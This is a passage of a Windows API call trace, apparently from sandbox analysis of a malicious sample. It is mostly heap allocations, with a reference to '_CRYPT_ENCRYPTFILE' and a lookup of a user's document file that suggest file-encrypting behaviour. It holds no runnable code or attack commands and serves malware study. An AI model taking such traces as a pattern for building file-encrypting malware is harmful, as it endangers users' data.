[0082.508] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a20 | out: hHeap=0x1780000) returned 1 [0082.508] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae68 [0082.508] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a60 [0082.508] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae20 [0082.508] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a60 | out: hHeap=0x1780000) returned 1 [0082.508] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb2e8 [0082.508] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2990 [0082.508] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2990 | out: hHeap=0x1780000) returned 1 [0082.508] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a20 [0082.508] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb1b0 [0082.508] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0082.508] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb0c0 [0082.508] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a50 [0082.508] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2af0 [0082.508] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb150 [0082.508] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb0c0 | out: hHeap=0x1780000) returned 1 [0082.508] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a50 | out: hHeap=0x1780000) returned 1 [0082.508] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb150 | out: hHeap=0x1780000) returned 1 [0082.508] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2af0 | out: hHeap=0x1780000) returned 1 [0082.508] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0030 [0082.508] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a50 [0082.508] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb168 [0082.508] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2af0 [0082.508] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a60 [0082.508] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb2a0 [0082.508] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb168 | out: hHeap=0x1780000) returned 1 [0082.509] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2af0 | out: hHeap=0x1780000) returned 1 [0082.509] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb2a0 | out: hHeap=0x1780000) returned 1 [0082.509] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a60 | out: hHeap=0x1780000) returned 1 [0082.509] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x772d0000 [0082.509] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb1c8 [0082.509] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2970 [0082.509] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0082.509] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43cb240 [0082.509] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x43cb240, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CloseHandle", lpUsedDefaultChar=0x0) returned 12 [0082.509] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb240 | out: hHeap=0x1780000) returned 1 [0082.509] GetProcAddress (hModule=0x772d0000, lpProcName="CloseHandle") returned 0x7733eab0 [0082.509] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb1c8 | out: hHeap=0x1780000) returned 1 [0082.509] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2970 | out: hHeap=0x1780000) returned 1 [0082.509] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cff90 [0082.509] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2970 [0082.509] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2970 | out: hHeap=0x1780000) returned 1 [0082.509] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cff90 | out: hHeap=0x1780000) returned 1 [0082.509] CloseHandle (hObject=0x298) returned 1 [0082.510] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2b00 [0082.510] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x214) returned 0x43ea730 [0082.510] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2af0 [0082.510] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb360 [0082.510] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb138 [0082.510] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb240 [0082.510] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a60 [0082.510] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb240 | out: hHeap=0x1780000) returned 1 [0082.510] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a60 | out: hHeap=0x1780000) returned 1 [0082.510] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb138 | out: hHeap=0x1780000) returned 1 [0082.510] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb0c0 [0082.510] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb180 [0082.510] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb2b8 [0082.510] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a60 [0082.510] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb2b8 | out: hHeap=0x1780000) returned 1 [0082.510] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a60 | out: hHeap=0x1780000) returned 1 [0082.510] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb180 | out: hHeap=0x1780000) returned 1 [0082.510] FreeLibrary (hLibModule=0x772d0000) returned 1 [0082.510] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a50 | out: hHeap=0x1780000) returned 1 [0082.510] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0030 | out: hHeap=0x1780000) returned 1 [0082.510] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb1b0 | out: hHeap=0x1780000) returned 1 [0082.510] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a20 | out: hHeap=0x1780000) returned 1 [0082.510] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb078 | out: hHeap=0x1780000) returned 1 [0082.510] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cada8 | out: hHeap=0x1780000) returned 1 [0082.510] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cadc0 | out: hHeap=0x1780000) returned 1 [0082.510] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad90 | out: hHeap=0x1780000) returned 1 [0082.510] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cadf0 | out: hHeap=0x1780000) returned 1 [0082.510] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cadd8 | out: hHeap=0x1780000) returned 1 [0082.510] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae20 | out: hHeap=0x1780000) returned 1 [0082.510] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae68 | out: hHeap=0x1780000) returned 1 [0082.511] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb2e8 | out: hHeap=0x1780000) returned 1 [0082.511] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cff68 | out: hHeap=0x1780000) returned 1 [0082.511] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb360 | out: hHeap=0x1780000) returned 1 [0082.511] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb0c0 | out: hHeap=0x1780000) returned 1 [0082.511] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2af0 | out: hHeap=0x1780000) returned 1 [0082.511] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ea730 | out: hHeap=0x1780000) returned 1 [0082.511] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b00 | out: hHeap=0x1780000) returned 1 [0082.511] PeekMessageW (in: lpMsg=0x144e7b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e7b4) returned 0 [0082.515] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a20 [0082.516] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a20 | out: hHeap=0x1780000) returned 1 [0082.516] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a9218 | out: hHeap=0x1780000) returned 1 [0082.516] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb030 | out: hHeap=0x1780000) returned 1 [0082.516] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb048 | out: hHeap=0x1780000) returned 1 [0082.516] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb80 | out: hHeap=0x1780000) returned 1 [0082.516] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a10 | out: hHeap=0x1780000) returned 1 [0082.516] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf978 | out: hHeap=0x1780000) returned 1 [0082.516] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb060 | out: hHeap=0x1780000) returned 1 [0082.516] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae50 | out: hHeap=0x1780000) returned 1 [0082.516] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a30 | out: hHeap=0x1780000) returned 1 [0082.516] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfba8 | out: hHeap=0x1780000) returned 1 [0082.516] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cafe8 | out: hHeap=0x1780000) returned 1 [0082.516] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29f0 | out: hHeap=0x1780000) returned 1 [0082.516] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb30 | out: hHeap=0x1780000) returned 1 [0082.516] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cafa0 | out: hHeap=0x1780000) returned 1 [0082.516] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cafd0 | out: hHeap=0x1780000) returned 1 [0082.516] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb58 | out: hHeap=0x1780000) returned 1 [0082.516] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2980 [0082.516] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796fc8 [0082.516] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2980 | out: hHeap=0x1780000) returned 1 [0082.516] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796fc8 | out: hHeap=0x1780000) returned 1 [0082.516] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796ee8 | out: hHeap=0x1780000) returned 1 [0082.516] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2960 | out: hHeap=0x1780000) returned 1 [0082.516] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29e0 | out: hHeap=0x1780000) returned 1 [0082.516] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac780 [0082.516] PeekMessageW (in: lpMsg=0x144ebd4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebd4) returned 0 [0082.516] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e29e0 [0082.516] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391a80 [0082.516] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0082.516] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391a80 | out: hHeap=0x1780000) returned 1 [0082.516] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29e0 | out: hHeap=0x1780000) returned 1 [0082.517] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfba8 [0082.517] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2a30 [0082.517] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf978 [0082.517] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cadf0 [0082.517] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2af0 [0082.517] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cafa0 [0082.517] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2af0 | out: hHeap=0x1780000) returned 1 [0082.517] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2960 [0082.518] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad90 [0082.518] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2940 [0082.518] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cafd0 [0082.518] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2af0 [0082.518] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797108 [0082.518] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae20 [0082.518] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2970 [0082.518] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc0) returned 0x1b22250 [0082.518] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae20 | out: hHeap=0x1780000) returned 1 [0082.518] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797108 | out: hHeap=0x1780000) returned 1 [0082.518] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2af0 | out: hHeap=0x1780000) returned 1 [0082.518] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2940 | out: hHeap=0x1780000) returned 1 [0082.518] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e29e0 [0082.518] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cafe8 [0082.518] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a50 [0082.518] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb030 [0082.518] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a50 | out: hHeap=0x1780000) returned 1 [0082.518] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2a60 [0082.518] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb048 [0082.518] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a10 [0082.518] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a10 | out: hHeap=0x1780000) returned 1 [0082.518] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43cb060 [0082.518] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb30 [0082.518] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb078 [0082.518] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e29f0 [0082.518] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb078 | out: hHeap=0x1780000) returned 1 [0082.518] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb58 [0082.519] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb078 [0082.519] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cada8 [0082.519] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb80 [0082.519] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cadc0 [0082.519] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2af0 [0082.519] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cadc0 | out: hHeap=0x1780000) returned 1 [0082.519] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391930 [0082.519] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae68 [0082.519] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cadc0 [0082.519] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfe28 [0082.519] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cadd8 [0082.519] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2b00 [0082.519] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cadd8 | out: hHeap=0x1780000) returned 1 [0082.519] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0008 [0082.519] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cadd8 [0082.519] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae20 [0082.519] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0198 [0082.519] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae50 [0082.519] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2b10 [0082.519] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb120 [0082.519] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a9218 [0082.519] PeekMessageW (in: lpMsg=0x144e97c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e97c) returned 0 [0082.519] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cff90 [0082.519] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb2a0 [0082.520] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2940 [0082.520] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb2a0 | out: hHeap=0x1780000) returned 1 [0082.520] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfe50 [0082.520] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb138 [0082.520] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb168 [0082.520] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a50 [0082.520] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb168 | out: hHeap=0x1780000) returned 1 [0082.520] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a50 | out: hHeap=0x1780000) returned 1 [0082.520] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d00d0 [0082.520] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb240 [0082.520] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2990 [0082.520] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb348 [0082.520] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb180 [0082.520] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a10 [0082.520] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb180 | out: hHeap=0x1780000) returned 1 [0082.520] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a10 | out: hHeap=0x1780000) returned 1 [0082.520] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0030 [0082.520] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb1f8 [0082.520] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a10 [0082.520] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb1f8 | out: hHeap=0x1780000) returned 1 [0082.520] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cff18 [0082.520] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb1c8 [0082.520] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb1f8 [0082.520] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a50 [0082.520] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb1f8 | out: hHeap=0x1780000) returned 1 [0082.520] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a50 | out: hHeap=0x1780000) returned 1 [0082.520] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfe00 [0082.520] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb180 [0082.521] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2980 [0082.521] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb2e8 [0082.521] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb300 [0082.521] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a20 [0082.521] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb300 | out: hHeap=0x1780000) returned 1 [0082.521] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a20 | out: hHeap=0x1780000) returned 1 [0082.521] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cffb8 [0082.521] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb0c0 [0082.521] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a20 [0082.521] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb0c0 | out: hHeap=0x1780000) returned 1 [0082.521] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0238 [0082.521] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb360 [0082.521] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb2a0 [0082.521] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a50 [0082.521] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb2a0 | out: hHeap=0x1780000) returned 1 [0082.521] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a50 | out: hHeap=0x1780000) returned 1 [0082.521] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0148 [0082.521] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb168 [0082.521] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a50 [0082.521] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb168 | out: hHeap=0x1780000) returned 1 [0082.521] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0120 [0082.521] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb2a0 [0082.521] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb378 [0082.521] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2c90 [0082.521] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb378 | out: hHeap=0x1780000) returned 1 [0082.521] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfea0 [0082.521] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb300 [0082.521] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2b30 [0082.521] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb1f8 [0082.521] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b30 | out: hHeap=0x1780000) returned 1 [0082.521] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\D2Y3tG\\kc_ drhegB\\WZ9w\\-HpKoiMRyoVVCXApKjWd\\bVjgYdkDx.odt", lpFindFileData=0x144e3c8 | out: lpFindFileData=0x144e3c8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6ac7bf90, ftCreationTime.dwHighDateTime=0x1d5ece1, ftLastAccessTime.dwLowDateTime=0x9abd5c50, ftLastAccessTime.dwHighDateTime=0x1d5e624, ftLastWriteTime.dwLowDateTime=0x9abd5c50, ftLastWriteTime.dwHighDateTime=0x1d5e624, nFileSizeHigh=0x0, nFileSizeLow=0x5570, dwReserved0=0x43c34c0, dwReserved1=0x8, cFileName="bVjgYdkDx.odt", cAlternateFileName="BVJGYD~1.ODT")) returned 0x41ac440 [0082.522] FindClose (in: hFindFile=0x41ac440 | out: hFindFile=0x41ac440) returned 1 [0082.522] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb1f8 | out: hHeap=0x1780000) returned 1 [0082.522] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb300 | out: hHeap=0x1780000) returned 1 [0082.522] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfea0 | out: hHeap=0x1780000) returned 1 [0082.522] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2c90 | out: hHeap=0x1780000) returned 1 [0082.522] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd60 [0082.522] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 